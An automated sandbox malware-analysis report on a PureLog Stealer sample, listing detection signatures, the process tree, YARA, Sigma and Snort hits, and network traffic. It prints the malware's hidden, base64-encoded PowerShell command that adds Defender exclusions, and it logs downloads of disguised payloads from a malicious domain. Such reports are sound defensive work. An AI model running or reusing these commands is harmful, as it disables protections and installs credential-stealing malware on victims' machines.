
Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1458397
MD5:af4a6267ce7f24818feeb7d2d62e72c2
SHA1:dd780f62e9539c39244526e26e518663b53fb20e
SHA256:43261f85db3ab88ed6e6b00b4227c5e8e90ddbcabb491109196a0643aeb3d313
Tags:exe

Detection

PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AF4A6267CE7F24818FEEB7D2D62E72C2)
  • powershell.exe (PID: 7748 cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA== MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • TypeId.exe (PID: 7764 cmdline: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe MD5: AF4A6267CE7F24818FEEB7D2D62E72C2)
    • InstallUtil.exe (PID: 8028 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • powershell.exe (PID: 8124 cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA== MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • txxbiwtbs.exe (PID: 3624 cmdline: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe MD5: E8CE921868FE7C47FD2C236555EE5BFD)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.3019858995.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000004.00000002.2976520133.000000000309D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0000000B.00000002.2160867351.0000000006470000.00000020.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0xb0508:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49; 0xb3a3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000000B.00000002.2048354854.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
(47 memory-dump matches in total; only the first are shown here.)
Source | Rule | Description | Author | Strings
0.2.file.exe.459c2e8.6.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.file.exe.459c2e8.6.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
3.2.TypeId.exe.4a46068.12.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
3.2.TypeId.exe.4a96088.4.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.file.exe.440c2a8.9.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
(55 unpacked-PE matches in total; only the first are shown here.)

                    System Summary

                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, ProcessId: 7748, ProcessName: powershell.exe
                    Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, ProcessId: 7748, ProcessName: powershell.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==, ProcessId: 7748, ProcessName: powershell.exe
Snort IDS alerts (Timestamp | SID | Source Port -> Destination Port | Protocol | Classtype):
06/17/24-16:18:47.509452 | 2017962 | 443 -> 49732 | TCP | A Network Trojan was detected
06/17/24-16:18:41.893163 | 2017962 | 443 -> 49731 | TCP | A Network Trojan was detected
06/17/24-16:18:41.893163 | 2022640 | 443 -> 49731 | TCP | A Network Trojan was detected
06/17/24-16:18:47.509452 | 2022640 | 443 -> 49732 | TCP | A Network Trojan was detected
06/17/24-16:18:42.601428 | 2020482 | 443 -> 49731 | TCP | A Network Trojan was detected


                    AV Detection

Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | ReversingLabs: Detection: 13%
Source: file.exe | ReversingLabs: Detection: 13%
Source: file.exe | Virustotal: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | Joe Sandbox ML: detected
Source: file.exe | Joe Sandbox ML: detected
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:65277 version: TLS 1.2
                    Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.1786708622.0000000006F80000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.0000000003646000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002A00000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.1786708622.0000000006F80000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.0000000003646000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.0000000002A00000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1785706737.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.1824447213.0000000009EB1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3095261684.00000000076D6000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.2048354854.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Fbedztzxbbe.pdb source: file.exe, 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1767868411.0000000004378000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3019858995.0000000004922000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 07B8B94Ch
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 07B8B94Ch
                    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp 07B8CF3Eh
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 4x nop then jmp 06D5CF3Eh
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 4x nop then jmp 06D5B94Ch
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeCode function: 4x nop then jmp 06D5B94Ch
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 4x nop then jmp 056BD6D2h
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 4x nop then jmp 056BD6D2h
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 4x nop then jmp 056BD6D2h
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeCode function: 4x nop then jmp 056BD6D2h

                    Networking

                    Source: TrafficSnort IDS: 2022640 ET TROJAN PE EXE or DLL Windows file download Text M2 188.114.96.3:443 -> 192.168.2.4:49731
                    Source: TrafficSnort IDS: 2017962 ET TROJAN PE EXE or DLL Windows file download disguised as ASCII 188.114.96.3:443 -> 192.168.2.4:49731
                    Source: TrafficSnort IDS: 2020482 ET CURRENT_EVENTS DRIVEBY GENERIC ShellExecute in Hex No Seps 188.114.96.3:443 -> 192.168.2.4:49731
                    Source: TrafficSnort IDS: 2022640 ET TROJAN PE EXE or DLL Windows file download Text M2 188.114.96.3:443 -> 192.168.2.4:49732
                    Source: TrafficSnort IDS: 2017962 ET TROJAN PE EXE or DLL Windows file download disguised as ASCII 188.114.96.3:443 -> 192.168.2.4:49732
                    Source: global trafficTCP traffic: 192.168.2.4:49735 -> 77.221.140.76:58001
                    Source: global trafficHTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /don2/Qlxywcbxa.mp4 HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /don2-m/kr/Wudbiu.exe HTTP/1.1Host: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farmConnection: Keep-Alive
